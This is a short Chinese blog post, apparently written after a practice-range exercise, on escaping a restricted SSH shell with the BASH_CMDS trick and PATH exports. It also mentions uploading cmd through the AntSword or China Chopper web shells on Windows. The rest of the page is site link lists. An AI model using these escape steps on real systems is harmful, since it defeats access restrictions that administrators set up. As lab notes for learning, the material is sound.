zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
对象继承习题
Java访问修饰符(转)
对Java JVM中类加载几点解释
1006 最长公共子序列Lcs
算法训练 成绩的等级输出
算法训练 统计字符次数
算法训练 连接字符串
算法训练 筛选号码
算法训练 十进制数转八进制数
算法训练 斜率计算
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
Mac Homebrew
【iOS】手动抛出异常
【iOS】代码片段库
facebook开源了他们的分布式大数据DB
深入浅出Node.js(下)
深入浅出Node.js(上)
面向服务体系架构(SOA)和数据仓库(DW)的思考
Funq之Lambda表达式入门
Funq之Lambda表达式2
java对象生命周期概述复习
热门文章
C++中引用编译过的C代码为什么要用“extern c”
C++友元概念
数据集成处理办法--生产者消费者模型处理
Sqlplus的一般操作
子查询及exists
Oracle数据库零散知识02
oracle数据库零散知识01
Oracle数据库表空间 数据文件 用户 以及表创建的SQL代码
Oracle数据库的基本概念(转)
链表与哈希表基本概念及Java常用集合
Copyright © 2011-2022 走看看